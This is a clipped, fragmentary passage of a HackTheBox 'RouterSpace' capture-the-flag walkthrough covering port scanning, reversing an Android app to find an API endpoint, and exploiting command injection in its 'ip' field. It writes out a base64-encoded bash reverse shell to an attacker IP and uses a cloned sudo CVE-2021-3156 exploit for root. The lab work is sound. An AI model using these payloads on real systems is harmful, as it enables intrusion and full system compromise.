nmap. We can quickly scan for open ports and store them in a variable:
ports=$(nmap -p- --min-rate=1000 -T4 10.129.145.44 | grep "^[0-9]" | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//). Then, we can scan those specific ports in depth by running
nmap's built-in scripts:
nmap -p$ports -sC -sV 10.129.145.44.
sudo nmap -sU -r -T5 10.129.145.44 -v. This finds nothing:
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.129.145.44/FUZZ -fs 50-90:
/etc/hostsfile. I did this because the release arena machine IP addresses are all different while the app never changed. Therefore, the app didn't have a hardcoded IP address and instead would need to do a DNS lookup. I assumed the machine would follow the pattern of previous HackTheBox machines so I used
snap install --devmode --beta anboxand installed the RouterSpace application by first getting the
sudo apt install android-tools-adband then running
adb install RouterSpace.apk. I tried both mitmproxy and BurpSuite by adding the proxies with this command:
adb shell settings put global http_proxy <ip>:<port>(command from this StackOverflow answer), but still could not get network traffic from the app.
apktool d RouterSpace.apkto decompile and then in the
assetsfolder there will be a
index.android.bundlefile containing the React Native Application. Tried using jsnice.org on this whole file but also used richardfuca/react-native-decompiler to hopefully clean up the code a little. It turns out that just using jsnice.org is better once you find the relevant code snippet. Searching for the "connet" string, which I observed in an error message when emulating the app, finds the actually important code. I originally thought that trying to manually reverse this would be difficult, but it isn't too hard.
__dfunction that contained the word "connet" and put it in code_1.js with some basic automatic formatting. I put code_1.js through jsnice.org, which cleaned it up a little, and pasted the output in code_2.js. Then, I began simplifying and deobfuscating the code in code_3.js. I created code_4.js once I figured out how the
outputvariable was modified. I used the
nodeconsole to run bits of code to avoid having to completely reverse them. Eventually, I was able to determine what was in the
datadictionary. I pasted the whole thing into the
nodeshell so it would evaluate it and then I printed it out, which revealed this:
EwCVLkey there is the URL the app tries to access. So, the code
searchSelect2(249) + searchSelect2(192) + searchSelect2(156) + searchSelect2(205) + searchSelect2(195) + searchSelect2(161) + searchSelect2(238)evaluates to
EwCVL, which means
data[searchSelect2(241)]evaluates to the URL.
searchSelect2in code_5.js, we see that the app performs a post request to
http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccesswith the headers
Content-Type: application/json. The app sends at least one key value pair as JSON. We know that the key is
ipsince the app checks to make sure it is not
0.0.0.0, back to use.
"\npaul\n". So, we have a command injection!
bashreverse shell. Start a listener with netcat (
nc -nvlp 58437) or
pwncat-cs -lp 58437). Then, we can encode the reverse shell
bash -i >& /dev/tcp/10.10.15.49/58437 0>&1to base64 with
echo -n "bash -i >& /dev/tcp/10.10.15.49/58437 0>&1" | base64to get
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS40OS81ODQzNyAwPiYx. We encode to base64 to remove illegal characters. Now, our payload is
;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS40OS81ODQzNyAwPiYx | base64 -d | bash(we need to
;at the front so we can run it after whatever command is being run).
curlto execute our payload by running the following command:
pwncat) and run it with
bash linpeas.sh. This doesn't show much but says
1.8.31is installed, which we can also see by running
git clone https://github.com/CptGibbon/CVE-2021-3156.gitand then upload the
exploit.cfiles. Finally, run
./exploitto get a shell as root.
cat /root/root.txtto get the